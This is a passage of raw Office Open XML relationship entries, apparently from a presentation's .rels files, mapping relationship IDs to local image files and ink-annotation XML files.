Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image225.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink240.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image245.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink261.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image281.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink300.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image297.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image267.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image220.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink235.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image240.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink256.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image276.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink295.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image261.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image292.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink230.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image236.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink251.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink278.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink290.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image256.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image287.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink225.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image231.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink273.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink285.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink246.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink254.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image251.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image259.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink267.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image282.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink293.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink301.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29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2.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image226.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink233.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image238.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink276.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink241.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink249.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image246.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image254.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink262.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image277.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink288.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink296.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image290.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image221.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink228.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image234.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image268.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink236.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink244.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image241.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink257.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image262.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink271.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink279.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink282.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink291.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image285.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink304.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image218.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image249.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink265.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image293.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink220.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image229.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink231.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink239.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink252.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink274.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink286.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink299.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image244.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink260.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image288.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image224.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink226.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink234.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image232.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink247.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image252.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink269.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image266.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink283.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink294.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image296.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink223.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image239.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink255.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image260.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink268.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image274.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image283.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink302.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image227.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink242.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image247.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink277.xml"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink289.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image291.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink229.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image235.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink250.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image255.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink263.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image278.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink297.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image222.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink237.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image242.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink272.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink284.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink224.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image230.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink245.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image250.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink258.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink266.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image263.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image264.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink280.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink292.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image286.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink305.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink221.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image219.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink232.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image237.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink253.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image258.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink275.xml"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink287.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image289.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink227.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image233.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink248.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image253.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink270.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image275.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image284.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink264.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink303.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image228.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink243.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image248.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image279.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink259.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink298.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image223.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink238.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image243.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image265.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28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9.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image303.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink314.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink318.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image298.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image307.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink311.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image305.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image309.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink306.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink313.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink315.xml"/><Relationship Id="rId29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8.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image302.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink317.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image299.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image304.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image308.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink319.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink310.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image306.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image312.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink307.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image301.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink312.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink316.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image316.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image315.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3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7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32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2.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33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6.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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1.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink45.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink11.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23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6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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4.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId3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1.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink10.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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9.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44.xml"/><Relationship Id="rId91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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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4.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink43.xml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39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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9.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37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6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4.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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9.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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37.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image326.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image336.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink348.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink356.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image349.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image357.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink332.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image322.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink340.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink343.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink351.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image344.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image352.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink364.xml"/><Relationship Id="rId5" 